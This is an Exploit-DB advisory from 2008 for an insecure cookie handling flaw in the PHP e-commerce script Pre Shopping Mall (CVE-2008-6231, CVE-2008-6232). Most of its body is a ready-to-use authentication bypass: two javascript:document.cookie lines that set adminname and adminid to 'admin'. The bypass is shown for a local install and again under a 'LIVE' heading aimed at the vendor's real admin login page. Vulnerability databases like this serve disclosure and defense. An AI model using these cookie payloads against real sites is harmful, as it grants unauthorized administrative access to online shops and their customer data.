Pre Shopping Mall Insecure Cookie Handling Vulnerability

2008-11-05T00:00:00
ID EDB-ID:6998
Type exploitdb
Reporter G4N0K
Modified 2008-11-05T00:00:00

Description

Pre Shopping Mall Insecure Cookie Handling Vulnerability. CVE-2008-6231,CVE-2008-6232. Webapps exploit for php platform

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PRE SHOPPING MALL Insecure Cookie Handling
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	PRE SHOPPING MALL
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/emall.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ LIVE ]===
Admin Panel: http://preproject.com/emall/admin/loginform.php
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";





===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]